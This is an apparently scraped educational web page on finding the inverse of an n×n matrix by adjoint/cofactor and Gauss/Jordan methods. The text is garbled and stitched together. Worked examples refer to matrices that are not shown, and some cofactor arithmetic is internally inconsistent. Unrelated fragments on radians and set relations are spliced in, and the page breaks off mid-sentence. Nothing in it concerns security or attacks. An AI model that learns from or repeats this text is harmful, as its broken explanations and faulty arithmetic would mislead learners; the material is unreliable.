EulerSequenceIndicator.EULER321);\ndouble yaw = yawPitchRoll.getFirstRotation().getAngle();\ndouble pitch = yawPitchRoll.getSecondRotation().getAngle();\ndouble roll = yawPitchRoll.getThirdRotation().getAngle();``````\n`AngleAxisRotation`, `ElementaryRotation`, `Matrix3By3`, `Quaternion`, `UnitQuaternion`, `YawPitchRoll`\n• ### Method Summary\n\nAll Methods\nModifier and Type Method and Description\n`static boolean` ```equals(EulerSequence left, EulerSequence right)```\nReturns `true` if the two instances are exactly equal.\n`boolean` `equals(Object obj)`\nIndicates whether another object is exactly equal to this instance.\n`boolean` ```equalsEpsilon(EulerSequence other, double epsilon)```\nReturns `true` if all of the elements of this rotation are within `epsilon` of the same elements of the specified rotation.\n`boolean` `equalsType(EulerSequence other)`\nIndicates whether another instance of this type is exactly equal to this instance.\n`static AxisIndicator` `firstAxis(EulerSequenceIndicator sequence)`\nDetermines the first axis indicator from the provided `EulerSequenceIndicator`.\n`ElementaryRotation` `getFirstRotation()`\nGets the first rotation.\n`ElementaryRotation` `getSecondRotation()`\nGets the second rotation.\n`EulerSequenceIndicator` `getSequence()`\nGets the order of the axes rotations for this instance.\n`ElementaryRotation` `getThirdRotation()`\nGets the third rotation.\n`int` `hashCode()`\nReturns a hash code for this instance, which is suitable for use in hashing algorithms and data structures like a hash table.\n`static EulerSequenceIndicator` ```indicator(AxisIndicator first, AxisIndicator second, AxisIndicator third)```\n`EulerSequence` `invert()`\nInverts this instance, yielding a new `EulerSequence`.\n`static boolean` ```notEquals(EulerSequence left, EulerSequence right)```\nReturns `true` if the two instances are not exactly equal.\n`static AxisIndicator` `secondAxis(EulerSequenceIndicator sequence)`\nDetermines the second axis indicator from the provided `EulerSequenceIndicator`.\n`static AxisIndicator` `thirdAxis(EulerSequenceIndicator sequence)`\nDetermines the third axis indicator from the provided `EulerSequenceIndicator`.\n`String` `toString()`\nReturns the value of this set of `EulerSequence` coordinates in the form \"first rotation, second rotation, third rotation\"\n• ### Methods inherited from class java.lang.Object\n\n`clone, finalize, getClass, notify, notifyAll, wait, wait, wait`\n• ### Constructor Detail\n\n• #### EulerSequence\n\n`public EulerSequence()`\nInitializes a new instance.\n• #### EulerSequence\n\n```public EulerSequence(double angle1,\ndouble angle2,\ndouble angle3,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided angles and sequence.\nParameters:\n`angle1` - The first angle.\n`angle2` - The second angle.\n`angle3` - The third angle.\n`sequence` - The sequence.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nElementaryRotation firstRotation,\n@Nonnull\nElementaryRotation secondRotation,\n@Nonnull\nElementaryRotation thirdRotation)```\nParameters:\n`firstRotation` - The first rotation.\n`secondRotation` - The second rotation.\n`thirdRotation` - The third rotation.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nMatrix3By3 matrix,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided `Matrix3By3` and sequence.\n\nNote that the `matrix` must be an orthogonal rotation matrix.\n\nParameters:\n`matrix` - The orthogonal rotation matrix.\n`sequence` - The sequence.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nUnitQuaternion quaternion,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided `UnitQuaternion` and sequence.\nParameters:\n`quaternion` - The unit quaternion.\n`sequence` - The sequence.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nAngleAxisRotation rotation,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided `AngleAxisRotation` and sequence.\nParameters:\n`rotation` - The rotation.\n`sequence` - The sequence.\n• ### Method Detail\n\n• #### indicator\n\n```@Nonnull\npublic static EulerSequenceIndicator indicator(@Nonnull\nAxisIndicator first,\n@Nonnull\nAxisIndicator second,\n@Nonnull\nAxisIndicator third)```\nParameters:\n`first` - The first axis of rotation.\n`second` - The second axis of rotation.\n`third` - The third axis of rotation.\nReturns:\nThe indicator.\n• #### firstAxis\n\n```@Nonnull\npublic static AxisIndicator firstAxis(@Nonnull\nEulerSequenceIndicator sequence)```\nDetermines the first axis indicator from the provided `EulerSequenceIndicator`.\nParameters:\n`sequence` - The order of the axes of rotation.\nReturns:\nThe first axis indicator.\n• #### secondAxis\n\n```@Nonnull\npublic static AxisIndicator secondAxis(@Nonnull\nEulerSequenceIndicator sequence)```\nDetermines the second axis indicator from the provided `EulerSequenceIndicator`.\nParameters:\n`sequence` - The order of the axes of rotation.\nReturns:\nThe second axis indicator.\n• #### thirdAxis\n\n```@Nonnull\npublic static AxisIndicator thirdAxis(@Nonnull\nEulerSequenceIndicator sequence)```\nDetermines the third axis indicator from the provided `EulerSequenceIndicator`.\nParameters:\n`sequence` - The order of the axes of rotation.\nReturns:\nThe third axis indicator.\n• #### getFirstRotation\n\n```@Nonnull\npublic final ElementaryRotation getFirstRotation()```\nGets the first rotation.\n• #### getSecondRotation\n\n```@Nonnull\npublic final ElementaryRotation getSecondRotation()```\nGets the second rotation.\n• #### getThirdRotation\n\n```@Nonnull\npublic final ElementaryRotation getThirdRotation()```\nGets the third rotation.\n• #### getSequence\n\n```@Nonnull\npublic final EulerSequenceIndicator getSequence()```\nGets the order of the axes rotations for this instance.\n• #### equals\n\n`public boolean equals(Object obj)`\nIndicates whether another object is exactly equal to this instance.\nOverrides:\n`equals` in class `Object`\nParameters:\n`obj` - The object to compare to this instance.\nReturns:\n`true` if `obj` is an instance of this type and represents the same value as this instance; otherwise `false`.\n`Object.hashCode()`, `HashMap`\n• #### equalsType\n\n```public final boolean equalsType(@Nonnull\nEulerSequence other)```\nIndicates whether another instance of this type is exactly equal to this instance.\nSpecified by:\n`equalsType` in interface `IEquatable<EulerSequence>`\nParameters:\n`other` - The instance to compare to this instance.\nReturns:\n`true` if `other` represents the same value as this instance; otherwise `false`.\n• #### equalsEpsilon\n\n```public final boolean equalsEpsilon(@Nonnull\nEulerSequence other,\ndouble epsilon)```\nReturns `true` if all of the elements of this rotation are within `epsilon` of the same elements of the specified rotation. That is, in order for the rotations to be considered equal (and for this function to return `true`), the absolute value of the difference between each of their elements must be less than or equal to `epsilon`.\nSpecified by:\n`equalsEpsilon` in interface `IEquatableEpsilon<EulerSequence>`\nParameters:\n`other` - The rotation to compare to this rotation.\n`epsilon` - The largest difference between the elements of the rotations for which they will be considered equal.\nReturns:\n`true` if the rotations are equal as defined by the epsilon value.\n• #### toString\n\n`public String toString()`\nReturns the value of this set of `EulerSequence` coordinates in the form \"first rotation, second rotation, third rotation\"\nOverrides:\n`toString` in class `Object`\nReturns:\nThe string.\n• #### equals\n\n```public static boolean equals(@Nonnull\nEulerSequence left,\n@Nonnull\nEulerSequence right)```\nReturns `true` if the two instances are exactly equal.\nParameters:\n`left` - The instance to compare to `right`.\n`right` - The instance to compare to `left`.\nReturns:\n`true` if `left` represents the same value as `right`; otherwise `false`.\n• #### notEquals\n\n```public static boolean notEquals(@Nonnull\nEulerSequence left,\n@Nonnull\nEulerSequence right)```\nReturns `true` if the two instances are not exactly equal.\nParameters:\n`left` - The instance to compare to `right`.\n`right` - The instance to compare to `left`.\nReturns:\n`true` if `left` does not represent the same value as `right`; otherwise `false`." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6439353,"math_prob":0.73381263,"size":9494,"snap":"2023-14-2023-23","text_gpt3_token_len":1952,"char_repetition_ratio":0.2548999,"word_repetition_ratio":0.24269265,"special_character_ratio":0.17010744,"punctuation_ratio":0.132206,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9812698,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-31T01:34:31Z\",\"WARC-Record-ID\":\"<urn:uuid:1db1f311-93c4-4377-a6cc-f8116d2dc8f0>\",\"Content-Length\":\"61223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9d5785c-b8f5-451f-85a1-ce2c89ab09d1>\",\"WARC-Concurrent-To\":\"<urn:uuid:1bd7b2c8-5dc0-4d9c-a7f9-dfe4b7b16542>\",\"WARC-IP-Address\":\"65.89.176.231\",\"WARC-Target-URI\":\"https://help.agi.com/STKComponentsJava/Javadoc/agi-foundation-coordinates-EulerSequence.html\",\"WARC-Payload-Digest\":\"sha1:VWDOPQ5E2I4YZDKZXSRP7DZSKBGGK5WF\",\"WARC-Block-Digest\":\"sha1:O3J4HSFR5UTFHMWS33RUHXX2FRZITYIE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224646181.29_warc_CC-MAIN-20230530230622-20230531020622-00373.warc.gz\"}"}
https://rdrr.io/github/Lucaweihs/SEMID/man/graphID.htcID.html
[ "# graphID.htcID: Determines if a mixed graph is HTC-identifiable. In Lucaweihs/SEMID: Identifiability of Linear Structural Equation Models\n\n## Description\n\nUses the half-trek criterion of Foygel, Draisma, and Drton (2013) to check if an input mixed graph is generically identifiable.\n\n## Usage\n\n `1` ```graphID.htcID(L, O) ```\n\n## Arguments\n\n `L` Adjacency matrix for the directed part of the path diagram/mixed graph; an edge pointing from i to j is encoded as L[i,j]=1 and the lack of an edge between i and j is encoded as L[i,j]=0. There should be no directed self loops, i.e. no i such that L[i,i]=1. `O` Adjacency matrix for the bidirected part of the path diagram/mixed graph. Edges are encoded as for the L parameter. Again there should be no self loops. Also this matrix will be coerced to be symmetric so it is only necessary to specify an edge once, i.e. if O[i,j]=1 you may, but are not required to, also have O[j,i]=1.\n\n## Value\n\nThe vector of HTC-identifiable nodes.\n\n## References\n\nFoygel, R., Draisma, J., and Drton, M. (2012) Half-trek criterion for generic identifiability of linear structural equation models. Ann. Statist. 40(3): 1682-1713.\n\nLucaweihs/SEMID documentation built on June 3, 2019, 2:13 a.m." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83094776,"math_prob":0.85751617,"size":1105,"snap":"2020-34-2020-40","text_gpt3_token_len":295,"char_repetition_ratio":0.08719346,"word_repetition_ratio":0.021978023,"special_character_ratio":0.25791857,"punctuation_ratio":0.168,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9723158,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-01T12:23:51Z\",\"WARC-Record-ID\":\"<urn:uuid:c16f4761-681b-4589-9f05-fef0304f03ef>\",\"Content-Length\":\"44697\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:667e4432-8581-476f-ab91-49a53a682362>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e3228dc-6c27-4102-96cc-8fe58812b9c0>\",\"WARC-IP-Address\":\"51.81.81.92\",\"WARC-Target-URI\":\"https://rdrr.io/github/Lucaweihs/SEMID/man/graphID.htcID.html\",\"WARC-Payload-Digest\":\"sha1:V6W6UILRFRPEOOEO64DVSW3MWEWPW2W5\",\"WARC-Block-Digest\":\"sha1:7BI47JLY6QF5UTOAPSVM5KQZYP5T2AW4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600402131412.93_warc_CC-MAIN-20201001112433-20201001142433-00665.warc.gz\"}"}
https://amansingh-javatpoint.medium.com/3d-rotation-in-computer-graphics-b1ab09d9ee1?source=user_profile---------7----------------------------
[ "# 3D Rotation in Computer Graphics\n\nThe 3D rotation is different from 2D rotation. In 3D Rotation we also have to define the angle of Rotation with the axis of Rotation.\n\nFor Example-Let us assume,\n\nThe initial coordinates of an object = (x0, y0, z0)\n\nThe Initial angle from origin = ?\n\nThe Rotation angle = ?\n\nThe new coordinates after Rotation = (x1, y1, z1)\n\nIn Three-dimensional plane we can define Rotation by following three ways\n\n1. X-axis Rotation: We can rotate the object along x-axis. We can rotate an object by using following equation-\n\nX1 = x0\n\nY1 = y0 cos?z0 x sin?\n\nZ1 = y0 x sin?+ z0 x cos?\n\nWe can represent 3D rotation in the form of matrix-\n\n2. Y-axis Rotation: We can rotate the object along y-axis. We can rotate an object by using following equation-\n\nx1 = z0 x sin? + x0 x cos?\n\ny1 = y0\n\nz1 = y0 x cos? x0 x sin?\n\nWe can represent 3D rotation in the form of matrix\n\n3. Z-axis Rotation: We can rotate the object along z-axis. We can rotate an object by using following equation-\n\nx1 = x0 x cos? y0 x sin?\n\ny1 = x0 x sin? + y0 x cos?\n\nz1 = z0\n\nWe can represent 3D rotation in the form of matrix\n\nExample: A Point has coordinates P (2, 3, 4) in x, y, z-direction. The Rotation angle is 90 degrees. Apply the rotation in x, y, z direction, and find out the new coordinates of the point?\n\nSolution: The initial coordinates of point = P (x0, y0, z0) = (2, 3, 4)\n\nRotation angle (?) = 90°\n\nFor x-axis\n\nLet the new coordinates = (x1, y1, z1) then,\n\nx1= x0 = 2\n\ny1= y0 x cos? — z0 x sin? = 3 x cos90°– 4 x sin90° = 3 x 0–4 x 1 = -4\n\nz1= y0 x sin? + z0 x cos? = 3 x sin90°+ 4 x cos90° = 3 x 1 + 4 x 0 = 3\n\nThe new coordinates of point = (2, -4, 3)\n\nFor y-axis\n\nLet the new coordinates = (x1, y1, z1) then,\n\nX1= z0 x sin? + x0 x cos? = 4 x sin90° + 2 x cos90° = 4 x 1 + 2 x 0 = 4\n\ny1= y0 = 3\n\nz1= y0 x cos&? — x0 x sin? = 3 x cos90°– 2 x sin90° = 3 x 0–4 x 0 = 0\n\nThe new coordinates of point = (4, 3, 0)\n\nFor z-axis\n\nLet the new coordinates = (x1, y1, z1) then,\n\nx1= x0 x cos? — y0 x sin? = 2 x cos90° — 3 x sin90° = 2 x 0 + 3 x 1 = 3\n\ny1= x0 x sin? + y0 x cos? = 2 x sin90° ­+ 3 x cos90° = 2 x 1 + 3 x 0 = 2\n\nz1= z0 =4\n\nThe New Coordinates of points = (3, 2, 4)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.734415,"math_prob":1.000001,"size":2139,"snap":"2023-40-2023-50","text_gpt3_token_len":812,"char_repetition_ratio":0.18360655,"word_repetition_ratio":0.18255578,"special_character_ratio":0.40719962,"punctuation_ratio":0.13957936,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999777,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-03T01:48:15Z\",\"WARC-Record-ID\":\"<urn:uuid:713518e5-ab4c-424b-b5a5-05aba4a5f7ea>\",\"Content-Length\":\"220618\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c6b28f7-1bde-47af-8ae7-7c513d2e1f55>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd530a39-630b-4b82-914a-d4ad6f96d89d>\",\"WARC-IP-Address\":\"162.159.153.4\",\"WARC-Target-URI\":\"https://amansingh-javatpoint.medium.com/3d-rotation-in-computer-graphics-b1ab09d9ee1?source=user_profile---------7----------------------------\",\"WARC-Payload-Digest\":\"sha1:OCRVHYER4STLO732X3S4PYPOLE4EJD7D\",\"WARC-Block-Digest\":\"sha1:HGP4PSWOHKDKDT3LZIKHT7MKHBHAX6SR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100476.94_warc_CC-MAIN-20231202235258-20231203025258-00660.warc.gz\"}"}
http://www.crystaltenn.com/2016/08/simple-calculator-with-order-of.html
[ "## Simple Calculator with Order of Operations in C#\n\nHere is the Calculator with order of operations for multiplication, division, addition, and subtraction. No parenthesis, exponents, or other things included. This is using the tree method. We check for the operation that would be done last from right to left, and this is the first node of the tree. Keep in mind: \"multiplication and division are of equal precedence, as are addition and subtraction.\" Here is an example of how the tree works: Source: http://math.hws.edu/eck/cs225/s03/binary_trees/expressionTree.gif\n\nThis is the Program.cs file below.\n\nThis is some class file, for ex. Calc.cs below:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93453777,"math_prob":0.83156896,"size":641,"snap":"2019-51-2020-05","text_gpt3_token_len":141,"char_repetition_ratio":0.11930926,"word_repetition_ratio":0.0,"special_character_ratio":0.21372855,"punctuation_ratio":0.18045112,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99224097,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-05T19:56:15Z\",\"WARC-Record-ID\":\"<urn:uuid:38a9f9a2-7d7c-4630-8f8c-d49bdae6beea>\",\"Content-Length\":\"82689\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ac706b3a-1552-46a0-99de-a7fa0277cb5f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ef5877a-7c72-4d18-b3e2-72e5de18f853>\",\"WARC-IP-Address\":\"172.217.15.115\",\"WARC-Target-URI\":\"http://www.crystaltenn.com/2016/08/simple-calculator-with-order-of.html\",\"WARC-Payload-Digest\":\"sha1:TRD74LJWXKP5T3A2XIVSWFCBKQEUHZ2Z\",\"WARC-Block-Digest\":\"sha1:CLP3V3YXOTHDBW2VO3WC6JNMMOTBFAYK\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540482038.36_warc_CC-MAIN-20191205190939-20191205214939-00180.warc.gz\"}"}
https://brilliant.org/problems/easy-angles-2/
[ "# Easy Angles 2\n\nGeometry Level 3\n\nIn $\\triangle{ABC}$, $\\angle{A}$ is $30^\\circ$ and $\\angle{B}$ is $80^\\circ$. What is the measure of the complement of $\\angle{C}$ in degrees?\n\n×" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.736836,"math_prob":1.0000069,"size":269,"snap":"2021-04-2021-17","text_gpt3_token_len":105,"char_repetition_ratio":0.15849057,"word_repetition_ratio":0.0,"special_character_ratio":0.28996283,"punctuation_ratio":0.2238806,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99995077,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-16T00:19:10Z\",\"WARC-Record-ID\":\"<urn:uuid:138e2594-af39-4b5c-8ef8-9201297db852>\",\"Content-Length\":\"38878\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b3b185b7-5ba3-415a-ad5a-55b5b1c974b8>\",\"WARC-Concurrent-To\":\"<urn:uuid:7a7f4d5e-9c62-4115-a307-ab8c0d649e09>\",\"WARC-IP-Address\":\"104.20.34.242\",\"WARC-Target-URI\":\"https://brilliant.org/problems/easy-angles-2/\",\"WARC-Payload-Digest\":\"sha1:NAC5NRYQODWHJ2SMXLEXASAW7G7YIWEO\",\"WARC-Block-Digest\":\"sha1:FZFWQFTGXZFHAPG37FXKBQMPBVM2C2EV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703497681.4_warc_CC-MAIN-20210115224908-20210116014908-00744.warc.gz\"}"}
https://www.maa.org/press/periodicals/convergence/introducing-the-history-of-mathematics-an-italian-experience-using-original-documents-contents-of
[ "", null, "# Introducing the History of Mathematics: An Italian Experience Using Original Documents - Contents of Students' Volume\n\nAuthor(s):\n\nAs a brief introduction to the content and format of Fare mathematica some  excerpts are given in English translation:\n\nCONTENTS\n\nPreface by Fulvia Furinghetti\n\n.\n\nIntroduction for students.\n\nCHAPTER 1: FROM ARITHMETIC TO ALGEBRA - Numeration: Egyptians; Babylonians; Greeks; Romans; Mayas; Indians, at last; Who invented binary numbers? - Operations and non-negative integers: Middle Ages and Renaissance - Not only non-negative numbers: Fractions in Egypt: the Horus’ eye; How Egyptians wrote fractions; Decimals and Arabs; Decimals in Europe - The arithmetic triangle: Chinese, Arabs, Europeans… - Curious problems: Let’s solve together; Other problems: the text; Other problems: the solutions - “False” numbers: In sixteenth-century Italy; A woman grapples with mathematics - From words to symbols: A great Arabian mathematician; Diophantus left a mark; All of them are equations; A “recipe” to solve an equation; The science of “literal calculus”; Philosopher, physician and… mathematician - Problems and equations: Linear and quadratic problems - Bombelli and the number i: Is it a number? - Logarithms: An ancient idea; An authoritative answer - And more…  evolution of symbols.\n\nCHAPTER 2 – FACES OF GEOMETRY - Arithmetic and geometry: figurate numbers: Polygonal numbers; Pythagorean terns; Ingenious ways to obtain Pythagorean terns - Pythagorean theorem: A walk through history: sides and squares…; … a problem in the Renaissance…; …problems and equations - Far points: About towers and other buildings; How to bore a tunnel and not come out in the wrong place - Square root of 2: How did they do it? - pi: What is the true value? - Archimedes: A volley of propositions; The area of the circle and the method of exhaustion - Cartesian coordinates?…: In the fourteenth century; One of the fathers - Geometry, of Euclid and not: An authoritative introduction, but…; The Elements: almost a Bible; Two millennia later - Trigonometry: From a sixteenth-century book - What is topology?: A new geometry; The problem of Königsberg’s bridges; The explanation of Euler - And more… solid numbers.\n\nCHAPTER 3: THEMES OF MODERN MATHEMATICS - Logic: an ancient but current science: What are logical connectives?; The art of… reasoning; Mathematics takes possession of logic - Logic to build numbers: Gottlob Frege and Bertrand Russell - Let’s measure uncertainty: Galileo and a problem about the casting of three dice; Epistolary interchanges; The classical conception of probability; Other conceptions of probability - Infinity: Runners, arrows, hares, tortoise,…; The whole is not greater than the part; Infinite is a source of other paradoxes; Let’s arrange our knowledge - Cantor’s paradise: Real numbers are more than integers; Cantor in Hilbert’s opinion - Infinitesimals before Newton: The circle; The torus; The indivisibles - Limits, derivatives, integrals (I’m sorry if it is too little): Isaac Newton - We don’t stop… history continues…\n\nAdriano Dematte (Univ. of Genoa), \"Introducing the History of Mathematics: An Italian Experience Using Original Documents - Contents of Students' Volume,\" Convergence (February 2010), DOI:10.4169/loci002856\n\n## Dummy View - NOT TO BE DELETED\n\n•", null, "•", null, "•", null, "•", null, "•", null, "" ]
[ null, "https://px.ads.linkedin.com/collect/", null, "https://www.maa.org/sites/default/files/21.03.08%20MAA%20Press%20Book.png", null, "https://www.maa.org/sites/default/files/Dan%20Kalman%20VSI%20Slider.png", null, "https://www.maa.org/sites/default/files/22.03.11%20MathFest%202022%20Registration%20Open_0.png", null, "https://www.maa.org/sites/default/files/EOY%20Homepage%20Slider.png", null, "https://www.maa.org/sites/default/files/Service%20Center%20Update%20Homepage%20Slider.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8012514,"math_prob":0.7561549,"size":2984,"snap":"2022-27-2022-33","text_gpt3_token_len":683,"char_repetition_ratio":0.09932886,"word_repetition_ratio":0.0,"special_character_ratio":0.21213137,"punctuation_ratio":0.18634686,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9724734,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T02:32:34Z\",\"WARC-Record-ID\":\"<urn:uuid:dddc6865-6cac-468b-ab1a-56a6fe44d17d>\",\"Content-Length\":\"115367\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3f6f58a6-4251-4ab0-ba74-40f2e83ad1e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:20bc40d8-d564-4f95-b1cc-d519b2768af3>\",\"WARC-IP-Address\":\"172.67.186.65\",\"WARC-Target-URI\":\"https://www.maa.org/press/periodicals/convergence/introducing-the-history-of-mathematics-an-italian-experience-using-original-documents-contents-of\",\"WARC-Payload-Digest\":\"sha1:4O5PFOFDNCK7HAG4ZR5NWOAP4MYDMGKE\",\"WARC-Block-Digest\":\"sha1:L2XTBQKLFZWNPMRRCK6E35NPC4UQDN5O\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103324665.17_warc_CC-MAIN-20220627012807-20220627042807-00544.warc.gz\"}"}
https://www.travel-rs.info/5n6ryh35/article.php?7a495e=inverse-of-n-n-matrix
[ "# inverse of n n matrix\n\nP2 Cofactors of A are: Example 2 :-Find the inverse of the matrix, Solution :-Here,Expanding using 1st row, we get, = 1(6 –1) –2(4 –3) + 3(2 – 9) First calculate deteminant of matrix. where a, b, c and d are numbers. Let A be the name of our nxn matrix: non-square matrices have no inverse. A 3 x 3 matrix has 3 rows and 3 columns. Useful … E the above discussion, and even continue the above problem. pivoting skills. Note 3 : Compare the above 3 steps for According to the inverse of a matrix definition, a square matrix A of order n is said to be invertible if there exists another square matrix B of order n such that AB = BA = I. where I is the identity of order n*n. Identity matrix of order 2 is denoted by Matrix inversion is the process of finding the matrix B that satisfies the prior … Augment the nxn matrix A with the nxn Let us first define the inverse of a matrix. those used in GAUSS/JORDAN. = 5 – 2 × 1 + 3 × (–7) To find the inverse of a matrix A, i.e A-1 we shall first define the adjoint of a matrix. A-1, Acharya Nikatan, Mayur Vihar, Phase-1, Central Market, New Delhi-110091. In in the left We must find the inverse of the matrix A at the right P1, so the pivot The inverse matrix A-1 of a matrix A is such that the product AxA-1 is equal to the identity matrix. Copyright © 2020 Entrancei. 3x3 identity matrix in blue It is represented by M-1. The matrix Y is called the inverse of X. Here we find out inverse of a graph matrix using adjoint matrix and its determinant. If set A has p no. Note : Let A be square matrix of order n. Then, A −1 exists if and only if A is non-singular. Let us find out here. An invertible matrix is also sometimes … Next pivot on \"3\" in the 2-2 position below, encircled in red Define the matrix c, where. Note 2 : Check out Prof McFarland's The inverse is: The inverse of a general n × n matrix A can be found by using the following equation. B = bij) are known as the cofactors of a. So it must … Let A be the name of our nxn matrix: non-square matrices have no inverse. see Text ( Rolf, Pg 163) or scroll below differently from our text: follow Prof McFarland's naming style.   . (REDUCED)DIAGONALFORM The inverse of a matrix is just a reciprocal of the matrix as we do in normal arithmetic for a single number which is used to solve the equations to find the value of unknown variables. Definition of a g-Inverse. When step above is done, the right half of the latest matrix. If no such interchange produces i.e.the inverse A -1 of a matrix A is given by The inverse is defined only for nonsingular square matrices. We employ the latter, here. Inverse of a matrix can find out in many ways. If A is a non-singular square matrix, then there exists an inverse matrix A-1, which satisfies the following condition: it's row with a lower row. Professor McFarland names (2-2 position) is now \"1\".   ===> [ In Below is the same matrix A, augmented by   In more detail, suppose R is a commutative ring and A is an n × n matrix with entries from R. The (i,j)-minor of A, denoted M ij, is the determinant of the (n − 1) × (n − 1) matrix that results from deleting row i and column j of A. The transpose of c (i.e. row operations just a bit portion of the augmented matrix. Now, if A is matrix of a x b order, then the inverse of matrix A will be represented as A-1. We can obtain matrix inverse by following method. The reciprocal or inverse of a nonzero number a is the number b which is characterized by the property that ab = 1. In ; A generalized inverse (g-inverse) of an m´ n matrix A over a field F is an n´ m matrix G over F such that Gb is a solution of the system Ax = b of linear equations whenever b is such that this system is consistent. Now the question arises, how to find that inverse of matrix A is A-1. Next we perform Let us try an example: How do we know this is the right answer? The matrix A can be factorized as the product of an orthogonal matrix Q (m×n) and an upper triangular matrix R (n×n), thus, solving (1) is equivalent to solve Rx = Q^T b We now matrix if m = n and is known as a square matrix of order ‘n’. those used in GAUSS/JORDAN. See an example below, and try the A ij = (-1) ij det(M ij), where M ij is the (i,j) th minor matrix obtained from A after removing the ith row and jth column. A singular matrix is the one in which the determinant is not equal to zero. Next we perform pivot on the the above discussion, and even continue the above problem. Below are the row operations required for the first which is called the inverse of a such that: This is a C++ program to Find Inverse of a Graph Matrix. Inverse of a Matrix Definition. as you use row operations. pivoting Let A be a square matrix of order n. If there exists a square matrix B of order n such that. element in the 3-3 position, encircled in red below The result of multiplying the matrix by its inverse is commutative, meaning that it doesn't depend on the order of multiplication – A-1 xA is equal to AxA-1. Definition. The inverse is:the inverse of a general n × n matrix a can be found by using the following equation.where the adj (a) denotes the adjoint of a matrix.   There are mainly two ways to obtain the inverse matrix. For a nonsingular square matrix, the inverse is the quotient of the adjoint of the matrix and the determinant of the matrix. AB = BA = I n. then the matrix B is called an inverse of A. EXAMPLE OF FINDING THE INVERSE OF A MATRIX A C program to find Inverse of n x n matrix 2). A matrix X is invertible if there exists a matrix Y of the same size such that X Y = Y X = I n, where I n is the n-by-n identity matrix. take for example an arbitrary 2×2 matrix a whose determinant (ad − bc) is not equal to zero.where a, b, c and d are numbers. are below For instance, the inverse of 7 is 1 / 7. A square matrix is singular only when its determinant is exactly zero. Let A be an n × n (square) matrix. -1 1-2 It is easy to check the adjugate is the inverse times the determinant, −6. between this method and GAUSS/JORDAN method, used to solve a system of C Program to calculate inverse of a matrix 5). Well, for a 2x2 matrix the inverse is: In other words: swap the positions of a and d, put negatives in front of b and c, and divide everything by the determinant (ad-bc). 321 In such a case matrix B is known as the inverse of matrix A. Inverse of matrix A is symbolically represented by 'A-1'. Learn more about inverse matrix . Note 1 : interactivePIVOT ENGINE The terms of b (i.e. (iv) A square matrix B = [b ij] n×n is said to be a diagonal matrix if its all non diagonal elements are zero, that is a matrix B = [b ij] n×n is said to be a diagonal matrix if b ij = 0, when i ≠ j. The questions to find the Inverse of matrix can be asked as, 1). GENERALIZED INVERSES . If in a circle of radius r arc length of l subtend θ radian angle at centre then, Conversion of radian to degree and vice versa. This of the identity matrix of elements and set B has q number of elements then the total number of relations defined from set 